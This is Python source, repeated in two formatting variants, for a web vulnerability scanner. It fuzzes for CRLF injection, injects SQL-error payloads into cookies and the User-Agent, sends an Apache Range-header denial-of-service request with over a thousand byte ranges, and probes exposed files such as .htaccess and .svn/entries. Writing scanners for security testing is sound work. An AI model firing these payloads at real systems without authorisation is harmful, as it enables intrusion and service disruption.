class Crlf_injection(): def __init__(self): self.Print = Print() self.logger = LoggingManager() self.filepath = os.path.abspath(os.path.join(os.path.dirname(__file__), '../..')) def test_crlf_injection(self, target): payload = open(self.filepath + '/Fuzzdatabase/crlf_fuzzer.txt', 'r') if (target[:-1].endswith('/')) == False: target += "/" try: flag = requests.get(target) for i in payload.readlines()[1:]: req = requests.get(target + i) if req.text == flag.text: continue status = req.status_code if status != 404 and status != 403 and status != 400: poc = "POC: " + target + i self.Print.printer(3, "CRLF header Injection", data, status, poc) except Exception as e: print("Error occured while checking for crlf injection. Check module\ log for details") self.logger.module_log(e) return
class Crlf_injection(): def __init__(self): self.Print = Print() self.logger = LoggingManager() self.filepath = os.path.abspath( os.path.join(os.path.dirname(__file__), '../..')) def test_crlf_injection(self, target): payload = open(self.filepath + '/Fuzzdatabase/crlf_fuzzer.txt', 'r') if (target[:-1].endswith('/')) == False: target += "/" try: flag = requests.get(target) for i in payload.readlines()[1:]: req = requests.get(target + i) if req.text == flag.text: continue status = req.status_code if status != 404 and status != 403 and status != 400: poc = "POC: " + target + i self.Print.printer(3, "CRLF header Injection", data, status, poc) except Exception as e: print( "Error occured while checking for crlf injection. Check module\ log for details") self.logger.module_log(e) return
class Apache2_tests(): def __init__(self): self.logger = LoggingManager() self.Print = Print() def currentTime(self): return int(round(time.time() * 1000)) def execute_all_func(self, target): self.rangeInjection(target) self.mod_negotiation(target) def rangeInjection(self, target): timer = 0 avgTime = 0 rangeBuf = 'bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15,5-16,5-17,5-18,5-19,5-20,5-21,5-22,5-23,5-24,5-25,5-26,5-27,5-28,5-29,5-30,5-31,5-32,5-33,5-34,5-35,5-36,5-37,5-38,5-39,5-40,5-41,5-42,5-43,5-44,5-45,5-46,5-47,5-48,5-49,5-50,5-51,5-52,5-53,5-54,5-55,5-56,5-57,5-58,5-59,5-60,5-61,5-62,5-63,5-64,5-65,5-66,5-67,5-68,5-69,5-70,5-71,5-72,5-73,5-74,5-75,5-76,5-77,5-78,5-79,5-80,5-81,5-82,5-83,5-84,5-85,5-86,5-87,5-88,5-89,5-90,5-91,5-92,5-93,5-94,5-95,5-96,5-97,5-98,5-99,5-100,5-101,5-102,5-103,5-104,5-105,5-106,5-107,5-108,5-109,5-110,5-111,5-112,5-113,5-114,5-115,5-116,5-117,5-118,5-119,5-120,5-121,5-122,5-123,5-124,5-125,5-126,5-127,5-128,5-129,5-130,5-131,5-132,5-133,5-134,5-135,5-136,5-137,5-138,5-139,5-140,5-141,5-142,5-143,5-144,5-145,5-146,5-147,5-148,5-149,5-150,5-151,5-152,5-153,5-154,5-155,5-156,5-157,5-158,5-159,5-160,5-161,5-162,5-163,5-164,5-165,5-166,5-167,5-168,5-169,5-170,5-171,5-172,5-173,5-174,5-175,5-176,5-177,5-178,5-179,5-180,5-181,5-182,5-183,5-184,5-185,5-186,5-187,5-188,5-189,5-190,5-191,5-192,5-193,5-194,5-195,5-196,5-197,5-198,5-199,5-200,5-201,5-202,5-203,5-204,5-205,5-206,5-207,5-208,5-209,5-210,5-211,5-212,5-213,5-214,5-215,5-216,5-217,5-218,5-219,5-220,5-221,5-222,5-223,5-224,5-225,5-226,5-227,5-228,5-229,5-230,5-231,5-232,5-233,5-234,5-235,5-236,5-237,5-238,5-239,5-240,5-241,5-242,5-243,5-244,5-245,5-246,5-247,5-248,5-249,5-250,5-251,5-252,5-253,5-254,5-255,5-256,5-257,5-258,5-259,5-260,5-261,5-262,5-263,5-264,5-265,5-266,5-267,5-268,5-269,5-270,5-271,5-272,5-273,5-274,5-275,5-276,5-277,5-278,5-279,5-280,5-281,5-282,5-283,5-284,5-285,5-286,5-287,5-288,5-289,5-290,5-291,5-292,5-293,5-294,5-295,5-296,5-297,5-298,5-299,5-300,5-301,5-302,5-303,5-304,5-305,5-306,5-307,5-308,5-309,5-310,5-311,5-312,5-313,5-314,5-315,5-316,5-317,5-318,5-319,5-320,5-321,5-322,5-323,5-324,5-325,5-326,5-327,5-328,5-329,5-330,5-331,5-332,5-333,5-334,5-335,5-336,5-337,5-338,5-339,5-340,5-341,5-342,5-343,5-344,5-345,5-346,5-347,5-348,5-349,5-350,5-351,5-352,5-353,5-354,5-355,5-356,5-357,5-358,5-359,5-360,5-361,5-362,5-363,5-364,5-365,5-366,5-367,5-368,5-369,5-370,5-371,5-372,5-373,5-374,5-375,5-376,5-377,5-378,5-379,5-380,5-381,5-382,5-383,5-384,5-385,5-386,5-387,5-388,5-389,5-390,5-391,5-392,5-393,5-394,5-395,5-396,5-397,5-398,5-399,5-400,5-401,5-402,5-403,5-404,5-405,5-406,5-407,5-408,5-409,5-410,5-411,5-412,5-413,5-414,5-415,5-416,5-417,5-418,5-419,5-420,5-421,5-422,5-423,5-424,5-425,5-426,5-427,5-428,5-429,5-430,5-431,5-432,5-433,5-434,5-435,5-436,5-437,5-438,5-439,5-440,5-441,5-442,5-443,5-444,5-445,5-446,5-447,5-448,5-449,5-450,5-451,5-452,5-453,5-454,5-455,5-456,5-457,5-458,5-459,5-460,5-461,5-462,5-463,5-464,5-465,5-466,5-467,5-468,5-469,5-470,5-471,5-472,5-473,5-474,5-475,5-476,5-477,5-478,5-479,5-480,5-481,5-482,5-483,5-484,5-485,5-486,5-487,5-488,5-489,5-490,5-491,5-492,5-493,5-494,5-495,5-496,5-497,5-498,5-499,5-500,5-501,5-502,5-503,5-504,5-505,5-506,5-507,5-508,5-509,5-510,5-511,5-512,5-513,5-514,5-515,5-516,5-517,5-518,5-519,5-520,5-521,5-522,5-523,5-524,5-525,5-526,5-527,5-528,5-529,5-530,5-531,5-532,5-533,5-534,5-535,5-536,5-537,5-538,5-539,5-540,5-541,5-542,5-543,5-544,5-545,5-546,5-547,5-548,5-549,5-550,5-551,5-552,5-553,5-554,5-555,5-556,5-557,5-558,5-559,5-560,5-561,5-562,5-563,5-564,5-565,5-566,5-567,5-568,5-569,5-570,5-571,5-572,5-573,5-574,5-575,5-576,5-577,5-578,5-579,5-580,5-581,5-582,5-583,5-584,5-585,5-586,5-587,5-588,5-589,5-590,5-591,5-592,5-593,5-594,5-595,5-596,5-597,5-598,5-599,5-600,5-601,5-602,5-603,5-604,5-605,5-606,5-607,5-608,5-609,5-610,5-611,5-612,5-613,5-614,5-615,5-616,5-617,5-618,5-619,5-620,5-621,5-622,5-623,5-624,5-625,5-626,5-627,5-628,5-629,5-630,5-631,5-632,5-633,5-634,5-635,5-636,5-637,5-638,5-639,5-640,5-641,5-642,5-643,5-644,5-645,5-646,5-647,5-648,5-649,5-650,5-651,5-652,5-653,5-654,5-655,5-656,5-657,5-658,5-659,5-660,5-661,5-662,5-663,5-664,5-665,5-666,5-667,5-668,5-669,5-670,5-671,5-672,5-673,5-674,5-675,5-676,5-677,5-678,5-679,5-680,5-681,5-682,5-683,5-684,5-685,5-686,5-687,5-688,5-689,5-690,5-691,5-692,5-693,5-694,5-695,5-696,5-697,5-698,5-699,5-700,5-701,5-702,5-703,5-704,5-705,5-706,5-707,5-708,5-709,5-710,5-711,5-712,5-713,5-714,5-715,5-716,5-717,5-718,5-719,5-720,5-721,5-722,5-723,5-724,5-725,5-726,5-727,5-728,5-729,5-730,5-731,5-732,5-733,5-734,5-735,5-736,5-737,5-738,5-739,5-740,5-741,5-742,5-743,5-744,5-745,5-746,5-747,5-748,5-749,5-750,5-751,5-752,5-753,5-754,5-755,5-756,5-757,5-758,5-759,5-760,5-761,5-762,5-763,5-764,5-765,5-766,5-767,5-768,5-769,5-770,5-771,5-772,5-773,5-774,5-775,5-776,5-777,5-778,5-779,5-780,5-781,5-782,5-783,5-784,5-785,5-786,5-787,5-788,5-789,5-790,5-791,5-792,5-793,5-794,5-795,5-796,5-797,5-798,5-799,5-800,5-801,5-802,5-803,5-804,5-805,5-806,5-807,5-808,5-809,5-810,5-811,5-812,5-813,5-814,5-815,5-816,5-817,5-818,5-819,5-820,5-821,5-822,5-823,5-824,5-825,5-826,5-827,5-828,5-829,5-830,5-831,5-832,5-833,5-834,5-835,5-836,5-837,5-838,5-839,5-840,5-841,5-842,5-843,5-844,5-845,5-846,5-847,5-848,5-849,5-850,5-851,5-852,5-853,5-854,5-855,5-856,5-857,5-858,5-859,5-860,5-861,5-862,5-863,5-864,5-865,5-866,5-867,5-868,5-869,5-870,5-871,5-872,5-873,5-874,5-875,5-876,5-877,5-878,5-879,5-880,5-881,5-882,5-883,5-884,5-885,5-886,5-887,5-888,5-889,5-890,5-891,5-892,5-893,5-894,5-895,5-896,5-897,5-898,5-899,5-900,5-901,5-902,5-903,5-904,5-905,5-906,5-907,5-908,5-909,5-910,5-911,5-912,5-913,5-914,5-915,5-916,5-917,5-918,5-919,5-920,5-921,5-922,5-923,5-924,5-925,5-926,5-927,5-928,5-929,5-930,5-931,5-932,5-933,5-934,5-935,5-936,5-937,5-938,5-939,5-940,5-941,5-942,5-943,5-944,5-945,5-946,5-947,5-948,5-949,5-950,5-951,5-952,5-953,5-954,5-955,5-956,5-957,5-958,5-959,5-960,5-961,5-962,5-963,5-964,5-965,5-966,5-967,5-968,5-969,5-970,5-971,5-972,5-973,5-974,5-975,5-976,5-977,5-978,5-979,5-980,5-981,5-982,5-983,5-984,5-985,5-986,5-987,5-988,5-989,5-990,5-991,5-992,5-993,5-994,5-995,5-996,5-997,5-998,5-999,5-1000,5-1001,5-1002,5-1003,5-1004,5-1005,5-1006,5-1007,5-1008,5-1009,5-1010,5-1011,5-1012,5-1013,5-1014,5-1015,5-1016,5-1017,5-1018,5-1019,5-1020,5-1021,5-1022,5-1023,5-1024,5-1025,5-1026,5-1027,5-1028,5-1029,5-1030,5-1031,5-1032,5-1033,5-1034,5-1035,5-1036,5-1037,5-1038,5-1039,5-1040,5-1041,5-1042,5-1043,5-1044,5-1045,5-1046,5-1047,5-1048,5-1049,5-1050,5-1051,5-1052,5-1053,5-1054,5-1055,5-1056,5-1057,5-1058,5-1059,5-1060,5-1061,5-1062,5-1063,5-1064,5-1065,5-1066,5-1067,5-1068,5-1069,5-1070,5-1071,5-1072,5-1073,5-1074,5-1075,5-1076,5-1077,5-1078,5-1079,5-1080,5-1081,5-1082,5-1083,5-1084,5-1085,5-1086,5-1087,5-1088,5-1089,5-1090,5-1091,5-1092,5-1093,5-1094,5-1095,5-1096,5-1097,5-1098,5-1099,5-1100,5-1101,5-1102,5-1103,5-1104,5-1105,5-1106,5-1107,5-1108,5-1109,5-1110,5-1111,5-1112,5-1113,5-1114,5-1115,5-1116,5-1117,5-1118,5-1119,5-1120,5-1121,5-1122,5-1123,5-1124,5-1125,5-1126,5-1127,5-1128,5-1129,5-1130,5-1131,5-1132,5-1133,5-1134,5-1135,5-1136,5-1137,5-1138,5-1139,5-1140,5-1141,5-1142,5-1143,5-1144,5-1145,5-1146,5-1147,5-1148,5-1149,5-1150,5-1151,5-1152,5-1153,5-1154,5-1155,5-1156,5-1157,5-1158,5-1159,5-1160,5-1161,5-1162,5-1163,5-1164,5-1165,5-1166,5-1167,5-1168,5-1169,5-1170,5-1171,5-1172,5-1173,5-1174,5-1175,5-1176,5-1177,5-1178,5-1179,5-1180,5-1181,5-1182,5-1183,5-1184,5-1185,5-1186,5-1187,5-1188,5-1189,5-1190,5-1191,5-1192,5-1193,5-1194,5-1195,5-1196,5-1197,5-1198,5-1199,5-1200,5-1201,5-1202,5-1203,5-1204,5-1205,5-1206,5-1207,5-1208,5-1209,5-1210,5-1211,5-1212,5-1213,5-1214,5-1215,5-1216,5-1217,5-1218,5-1219,5-1220,5-1221,5-1222,5-1223,5-1224,5-1225,5-1226,5-1227,5-1228,5-1229,5-1230,5-1231,5-1232,5-1233,5-1234,5-1235,5-1236,5-1237,5-1238,5-1239,5-1240,5-1241,5-1242,5-1243,5-1244,5-1245,5-1246,5-1247,5-1248,5-1249,5-1250,5-1251,5-1252,5-1253,5-1254,5-1255,5-1256,5-1257,5-1258,5-1259,5-1260,5-1261,5-1262,5-1263,5-1264,5-1265,5-1266,5-1267,5-1268,5-1269,5-1270,5-1271,5-1272,5-1273,5-1274,5-1275,5-1276,5-1277,5-1278,5-1279,5-1280,5-1281,5-1282,5-1283,5-1284,5-1285,5-1286,5-1287,5-1288,5-1289,5-1290,5-1291,5-1292,5-1293,5-1294,5-1295,5-1296,5-1297,5-1298,5-1299' host = "www.google.com" headers = { 'X-Forwarded-Host': host, 'Accept-Encoding': 'gzip , deflate', 'Connection': 'keep-alive', 'Range': rangeBuf } timer = self.currentTime() req = requests.get(target) timer = self.currentTime() - timer avgTime = timer for i in range(4): timer = self.currentTime() req = requests.get(target) timer = self.currentTime() - timer avgTime = timer + avgTime / 2 realTime = avgTime timer = self.currentTime() req = requests.get(target, headers=headers) timer = self.currentTime() - timer avgTime = timer for i in range(4): timer = self.currentTime() req = requests.get(target, headers=headers) timer = self.currentTime() - timer avgTime = timer + avgTime / 2 if ((avgTime / realTime) > 5): self.Print.printer(2, "Apache2 Range Header DOS: ", None) # self.Print.printer(0, "Response time without range: " + realTime, # None, req.status_code) # self.Print.printer(0, "Response time with range: " + avgTime, # None, req.status_code) def mod_negotiation(self, target): headers = {'Accept': 'webxploiter/test'} req = requests.get(target + "/index", headers=headers) if req.status_code == 406: self.Print.printer(2, "Apache Mod Negotiation vulnerability", req.headers['alternates'], req.status_code)
class Apache2_tests: def __init__(self): self.logger = LoggingManager() self.Print = Print() def currentTime(self): return int(round(time.time() * 1000)) def execute_all_func(self, target): self.rangeInjection(target) self.mod_negotiation(target) def rangeInjection(self, target): timer = 0 avgTime = 0 rangeBuf = "bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15,5-16,5-17,5-18,5-19,5-20,5-21,5-22,5-23,5-24,5-25,5-26,5-27,5-28,5-29,5-30,5-31,5-32,5-33,5-34,5-35,5-36,5-37,5-38,5-39,5-40,5-41,5-42,5-43,5-44,5-45,5-46,5-47,5-48,5-49,5-50,5-51,5-52,5-53,5-54,5-55,5-56,5-57,5-58,5-59,5-60,5-61,5-62,5-63,5-64,5-65,5-66,5-67,5-68,5-69,5-70,5-71,5-72,5-73,5-74,5-75,5-76,5-77,5-78,5-79,5-80,5-81,5-82,5-83,5-84,5-85,5-86,5-87,5-88,5-89,5-90,5-91,5-92,5-93,5-94,5-95,5-96,5-97,5-98,5-99,5-100,5-101,5-102,5-103,5-104,5-105,5-106,5-107,5-108,5-109,5-110,5-111,5-112,5-113,5-114,5-115,5-116,5-117,5-118,5-119,5-120,5-121,5-122,5-123,5-124,5-125,5-126,5-127,5-128,5-129,5-130,5-131,5-132,5-133,5-134,5-135,5-136,5-137,5-138,5-139,5-140,5-141,5-142,5-143,5-144,5-145,5-146,5-147,5-148,5-149,5-150,5-151,5-152,5-153,5-154,5-155,5-156,5-157,5-158,5-159,5-160,5-161,5-162,5-163,5-164,5-165,5-166,5-167,5-168,5-169,5-170,5-171,5-172,5-173,5-174,5-175,5-176,5-177,5-178,5-179,5-180,5-181,5-182,5-183,5-184,5-185,5-186,5-187,5-188,5-189,5-190,5-191,5-192,5-193,5-194,5-195,5-196,5-197,5-198,5-199,5-200,5-201,5-202,5-203,5-204,5-205,5-206,5-207,5-208,5-209,5-210,5-211,5-212,5-213,5-214,5-215,5-216,5-217,5-218,5-219,5-220,5-221,5-222,5-223,5-224,5-225,5-226,5-227,5-228,5-229,5-230,5-231,5-232,5-233,5-234,5-235,5-236,5-237,5-238,5-239,5-240,5-241,5-242,5-243,5-244,5-245,5-246,5-247,5-248,5-249,5-250,5-251,5-252,5-253,5-254,5-255,5-256,5-257,5-258,5-259,5-260,5-261,5-262,5-263,5-264,5-265,5-266,5-267,5-268,5-269,5-270,5-271,5-272,5-273,5-274,5-275,5-276,5-277,5-278,5-279,5-280,5-281,5-282,5-283,5-284,5-285,5-286,5-287,5-288,5-289,5-290,5-291,5-292,5-293,5-294,5-295,5-296,5-297,5-298,5-299,5-300,5-301,5-302,5-303,5-304,5-305,5-306,5-307,5-308,5-309,5-310,5-311,5-312,5-313,5-314,5-315,5-316,5-317,5-318,5-319,5-320,5-321,5-322,5-323,5-324,5-325,5-326,5-327,5-328,5-329,5-330,5-331,5-332,5-333,5-334,5-335,5-336,5-337,5-338,5-339,5-340,5-341,5-342,5-343,5-344,5-345,5-346,5-347,5-348,5-349,5-350,5-351,5-352,5-353,5-354,5-355,5-356,5-357,5-358,5-359,5-360,5-361,5-362,5-363,5-364,5-365,5-366,5-367,5-368,5-369,5-370,5-371,5-372,5-373,5-374,5-375,5-376,5-377,5-378,5-379,5-380,5-381,5-382,5-383,5-384,5-385,5-386,5-387,5-388,5-389,5-390,5-391,5-392,5-393,5-394,5-395,5-396,5-397,5-398,5-399,5-400,5-401,5-402,5-403,5-404,5-405,5-406,5-407,5-408,5-409,5-410,5-411,5-412,5-413,5-414,5-415,5-416,5-417,5-418,5-419,5-420,5-421,5-422,5-423,5-424,5-425,5-426,5-427,5-428,5-429,5-430,5-431,5-432,5-433,5-434,5-435,5-436,5-437,5-438,5-439,5-440,5-441,5-442,5-443,5-444,5-445,5-446,5-447,5-448,5-449,5-450,5-451,5-452,5-453,5-454,5-455,5-456,5-457,5-458,5-459,5-460,5-461,5-462,5-463,5-464,5-465,5-466,5-467,5-468,5-469,5-470,5-471,5-472,5-473,5-474,5-475,5-476,5-477,5-478,5-479,5-480,5-481,5-482,5-483,5-484,5-485,5-486,5-487,5-488,5-489,5-490,5-491,5-492,5-493,5-494,5-495,5-496,5-497,5-498,5-499,5-500,5-501,5-502,5-503,5-504,5-505,5-506,5-507,5-508,5-509,5-510,5-511,5-512,5-513,5-514,5-515,5-516,5-517,5-518,5-519,5-520,5-521,5-522,5-523,5-524,5-525,5-526,5-527,5-528,5-529,5-530,5-531,5-532,5-533,5-534,5-535,5-536,5-537,5-538,5-539,5-540,5-541,5-542,5-543,5-544,5-545,5-546,5-547,5-548,5-549,5-550,5-551,5-552,5-553,5-554,5-555,5-556,5-557,5-558,5-559,5-560,5-561,5-562,5-563,5-564,5-565,5-566,5-567,5-568,5-569,5-570,5-571,5-572,5-573,5-574,5-575,5-576,5-577,5-578,5-579,5-580,5-581,5-582,5-583,5-584,5-585,5-586,5-587,5-588,5-589,5-590,5-591,5-592,5-593,5-594,5-595,5-596,5-597,5-598,5-599,5-600,5-601,5-602,5-603,5-604,5-605,5-606,5-607,5-608,5-609,5-610,5-611,5-612,5-613,5-614,5-615,5-616,5-617,5-618,5-619,5-620,5-621,5-622,5-623,5-624,5-625,5-626,5-627,5-628,5-629,5-630,5-631,5-632,5-633,5-634,5-635,5-636,5-637,5-638,5-639,5-640,5-641,5-642,5-643,5-644,5-645,5-646,5-647,5-648,5-649,5-650,5-651,5-652,5-653,5-654,5-655,5-656,5-657,5-658,5-659,5-660,5-661,5-662,5-663,5-664,5-665,5-666,5-667,5-668,5-669,5-670,5-671,5-672,5-673,5-674,5-675,5-676,5-677,5-678,5-679,5-680,5-681,5-682,5-683,5-684,5-685,5-686,5-687,5-688,5-689,5-690,5-691,5-692,5-693,5-694,5-695,5-696,5-697,5-698,5-699,5-700,5-701,5-702,5-703,5-704,5-705,5-706,5-707,5-708,5-709,5-710,5-711,5-712,5-713,5-714,5-715,5-716,5-717,5-718,5-719,5-720,5-721,5-722,5-723,5-724,5-725,5-726,5-727,5-728,5-729,5-730,5-731,5-732,5-733,5-734,5-735,5-736,5-737,5-738,5-739,5-740,5-741,5-742,5-743,5-744,5-745,5-746,5-747,5-748,5-749,5-750,5-751,5-752,5-753,5-754,5-755,5-756,5-757,5-758,5-759,5-760,5-761,5-762,5-763,5-764,5-765,5-766,5-767,5-768,5-769,5-770,5-771,5-772,5-773,5-774,5-775,5-776,5-777,5-778,5-779,5-780,5-781,5-782,5-783,5-784,5-785,5-786,5-787,5-788,5-789,5-790,5-791,5-792,5-793,5-794,5-795,5-796,5-797,5-798,5-799,5-800,5-801,5-802,5-803,5-804,5-805,5-806,5-807,5-808,5-809,5-810,5-811,5-812,5-813,5-814,5-815,5-816,5-817,5-818,5-819,5-820,5-821,5-822,5-823,5-824,5-825,5-826,5-827,5-828,5-829,5-830,5-831,5-832,5-833,5-834,5-835,5-836,5-837,5-838,5-839,5-840,5-841,5-842,5-843,5-844,5-845,5-846,5-847,5-848,5-849,5-850,5-851,5-852,5-853,5-854,5-855,5-856,5-857,5-858,5-859,5-860,5-861,5-862,5-863,5-864,5-865,5-866,5-867,5-868,5-869,5-870,5-871,5-872,5-873,5-874,5-875,5-876,5-877,5-878,5-879,5-880,5-881,5-882,5-883,5-884,5-885,5-886,5-887,5-888,5-889,5-890,5-891,5-892,5-893,5-894,5-895,5-896,5-897,5-898,5-899,5-900,5-901,5-902,5-903,5-904,5-905,5-906,5-907,5-908,5-909,5-910,5-911,5-912,5-913,5-914,5-915,5-916,5-917,5-918,5-919,5-920,5-921,5-922,5-923,5-924,5-925,5-926,5-927,5-928,5-929,5-930,5-931,5-932,5-933,5-934,5-935,5-936,5-937,5-938,5-939,5-940,5-941,5-942,5-943,5-944,5-945,5-946,5-947,5-948,5-949,5-950,5-951,5-952,5-953,5-954,5-955,5-956,5-957,5-958,5-959,5-960,5-961,5-962,5-963,5-964,5-965,5-966,5-967,5-968,5-969,5-970,5-971,5-972,5-973,5-974,5-975,5-976,5-977,5-978,5-979,5-980,5-981,5-982,5-983,5-984,5-985,5-986,5-987,5-988,5-989,5-990,5-991,5-992,5-993,5-994,5-995,5-996,5-997,5-998,5-999,5-1000,5-1001,5-1002,5-1003,5-1004,5-1005,5-1006,5-1007,5-1008,5-1009,5-1010,5-1011,5-1012,5-1013,5-1014,5-1015,5-1016,5-1017,5-1018,5-1019,5-1020,5-1021,5-1022,5-1023,5-1024,5-1025,5-1026,5-1027,5-1028,5-1029,5-1030,5-1031,5-1032,5-1033,5-1034,5-1035,5-1036,5-1037,5-1038,5-1039,5-1040,5-1041,5-1042,5-1043,5-1044,5-1045,5-1046,5-1047,5-1048,5-1049,5-1050,5-1051,5-1052,5-1053,5-1054,5-1055,5-1056,5-1057,5-1058,5-1059,5-1060,5-1061,5-1062,5-1063,5-1064,5-1065,5-1066,5-1067,5-1068,5-1069,5-1070,5-1071,5-1072,5-1073,5-1074,5-1075,5-1076,5-1077,5-1078,5-1079,5-1080,5-1081,5-1082,5-1083,5-1084,5-1085,5-1086,5-1087,5-1088,5-1089,5-1090,5-1091,5-1092,5-1093,5-1094,5-1095,5-1096,5-1097,5-1098,5-1099,5-1100,5-1101,5-1102,5-1103,5-1104,5-1105,5-1106,5-1107,5-1108,5-1109,5-1110,5-1111,5-1112,5-1113,5-1114,5-1115,5-1116,5-1117,5-1118,5-1119,5-1120,5-1121,5-1122,5-1123,5-1124,5-1125,5-1126,5-1127,5-1128,5-1129,5-1130,5-1131,5-1132,5-1133,5-1134,5-1135,5-1136,5-1137,5-1138,5-1139,5-1140,5-1141,5-1142,5-1143,5-1144,5-1145,5-1146,5-1147,5-1148,5-1149,5-1150,5-1151,5-1152,5-1153,5-1154,5-1155,5-1156,5-1157,5-1158,5-1159,5-1160,5-1161,5-1162,5-1163,5-1164,5-1165,5-1166,5-1167,5-1168,5-1169,5-1170,5-1171,5-1172,5-1173,5-1174,5-1175,5-1176,5-1177,5-1178,5-1179,5-1180,5-1181,5-1182,5-1183,5-1184,5-1185,5-1186,5-1187,5-1188,5-1189,5-1190,5-1191,5-1192,5-1193,5-1194,5-1195,5-1196,5-1197,5-1198,5-1199,5-1200,5-1201,5-1202,5-1203,5-1204,5-1205,5-1206,5-1207,5-1208,5-1209,5-1210,5-1211,5-1212,5-1213,5-1214,5-1215,5-1216,5-1217,5-1218,5-1219,5-1220,5-1221,5-1222,5-1223,5-1224,5-1225,5-1226,5-1227,5-1228,5-1229,5-1230,5-1231,5-1232,5-1233,5-1234,5-1235,5-1236,5-1237,5-1238,5-1239,5-1240,5-1241,5-1242,5-1243,5-1244,5-1245,5-1246,5-1247,5-1248,5-1249,5-1250,5-1251,5-1252,5-1253,5-1254,5-1255,5-1256,5-1257,5-1258,5-1259,5-1260,5-1261,5-1262,5-1263,5-1264,5-1265,5-1266,5-1267,5-1268,5-1269,5-1270,5-1271,5-1272,5-1273,5-1274,5-1275,5-1276,5-1277,5-1278,5-1279,5-1280,5-1281,5-1282,5-1283,5-1284,5-1285,5-1286,5-1287,5-1288,5-1289,5-1290,5-1291,5-1292,5-1293,5-1294,5-1295,5-1296,5-1297,5-1298,5-1299" host = "www.google.com" headers = { "X-Forwarded-Host": host, "Accept-Encoding": "gzip , deflate", "Connection": "keep-alive", "Range": rangeBuf, } timer = self.currentTime() req = requests.get(target) timer = self.currentTime() - timer avgTime = timer for i in range(4): timer = self.currentTime() req = requests.get(target) timer = self.currentTime() - timer avgTime = timer + avgTime / 2 realTime = avgTime timer = self.currentTime() req = requests.get(target, headers=headers) timer = self.currentTime() - timer avgTime = timer for i in range(4): timer = self.currentTime() req = requests.get(target, headers=headers) timer = self.currentTime() - timer avgTime = timer + avgTime / 2 if (avgTime / realTime) > 5: self.Print.printer(2, "Apache2 Range Header DOS: ", None) # self.Print.printer(0, "Response time without range: " + realTime, # None, req.status_code) # self.Print.printer(0, "Response time with range: " + avgTime, # None, req.status_code) def mod_negotiation(self, target): headers = {"Accept": "webxploiter/test"} req = requests.get(target + "/index", headers=headers) if req.status_code == 406: self.Print.printer(2, "Apache Mod Negotiation vulnerability", req.headers["alternates"], req.status_code)
class Sql_injection(): def __init__(self): self.Print = Print() self.logger = LoggingManager() self.filepath = os.path.abspath( os.path.join(os.path.dirname(__file__), '../..')) def execute_all_func(self, target): try: self.check_cookies(target) except Exception as e: print("Error while checking cookies.Check module log for details") self.logger.module_log(e) try: self.check_user_agent(target) except Exception as e: print( "Error while checking user agent.Check module log for details." ) self.logger.module_log(e) return def check_cookies(self, target): session = requests.Session() req = session.get(target) payload = open(self.filepath + '/Fuzzdatabase/error_sql.txt', 'r') check = ["MySQL server version", "have an error", "SQL syntax"] for i in payload.readlines(): i = i.strip("\n") for cookie in session.cookies: cookie.value += i r = session.get(target) for j in range(0, len(check)): if check[j] in r.text: poc = "POC: " + cookie.name + ": " + cookie.value self.Print.printer(3, "Error Based SQLi(Cookie Based)", None, req.status_code, poc) return def check_user_agent(self, target): payload = open(self.filepath + '/Fuzzdatabase/error_sql.txt', 'r') for i in payload.readlines(): user_agent = { 'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux' + 'x86_64; rv:39.0) Gecko/20100101 Firefox/39.0' } user_agent['User-agent'] += i req = urllib.request.Request(target, headers=user_agent) flag = str(urllib.request.urlopen(req).read()) check = ["MySQL server version", "have an error", "SQL syntax"] for j in range(0, len(check)): for line in re.finditer(check[j], flag): self.Print.printer(3, "Error Based SQLi(User Agent)", None, None, None) return
class Info_disclosure: def __init__(self): self.Print = Print() def check(self, target): req = requests.get(target + "/robots.txt") if req.status_code != 404: with closing(requests.get(target + "/robots.txt")) as stream: data = stream.text self.Print.printer(0, "Robots.txt analysis: ", data, req.status_code) req = requests.get(target + "/server-status") if req.status_code != 404: with closing(requests.get(target + "/server-status")) as stream: data = stream.text self.Print.printer(1, "server-status analysis: ", None, req.status_code) req = requests.get(target + "/.svn/entries") if req.status_code != 404: with closing(requests.get(target + "/.svn/entries")) as stream: data = stream.text self.Print.printer(1, "Svn entries analysis: ", None, req.status_code) req = requests.get(target + "/.htaccess") if req.status_code != 404: with closing(requests.get(target + "/.htaccess")) as stream: data = stream.text self.Print.printer(1, ".htaccess analysis: ", None, req.status_code) url = target.split('/')[2] httplib.HTTPSConnection._http_vsn = 10 httplib.HTTPSConnection._http_vsn_str = 'HTTP/1.0' req = httplib.HTTPSConnection(url) try: req.request("GET", "/") response = req.getresponse() if response.getheader('location'): location = response.getheader('Location') pieces = location.strip('https://').strip('http://').split('.') if len(pieces) >= 3 and self.hasNumbers(location): self.Print.printer(2, "Internal IP disclosure", location) req.close() except Exception as e: pass def hasNumbers(self, inputString): return any(char.isdigit() for char in inputString)
class Info_disclosure: def __init__(self): self.Print = Print() def check(self, target): req = requests.get(target+"/robots.txt") if req.status_code != 404: with closing(requests.get(target+"/robots.txt")) as stream: data = stream.text self.Print.printer(0, "Robots.txt analysis: ", data, req.status_code) req = requests.get(target+"/server-status") if req.status_code != 404: with closing(requests.get(target+"/server-status")) as stream: data = stream.text self.Print.printer(1, "server-status analysis: ", None, req.status_code) req = requests.get(target+"/.svn/entries") if req.status_code != 404: with closing(requests.get(target+"/.svn/entries")) as stream: data = stream.text self.Print.printer(1, "Svn entries analysis: ", None, req.status_code) req = requests.get(target+"/.htaccess") if req.status_code != 404: with closing(requests.get(target+"/.htaccess")) as stream: data = stream.text self.Print.printer(1, ".htaccess analysis: ", None, req.status_code) url = target.split('/')[2] httplib.HTTPSConnection._http_vsn = 10 httplib.HTTPSConnection._http_vsn_str = 'HTTP/1.0' req = httplib.HTTPSConnection(url) try: req.request("GET", "/") response = req.getresponse() if response.getheader('location'): location = response.getheader('Location') pieces = location.strip('https://').strip('http://').split('.') if len(pieces) >= 3 and self.hasNumbers(location): self.Print.printer(2, "Internal IP disclosure", location) req.close() except Exception as e: pass def hasNumbers(self, inputString): return any(char.isdigit() for char in inputString)
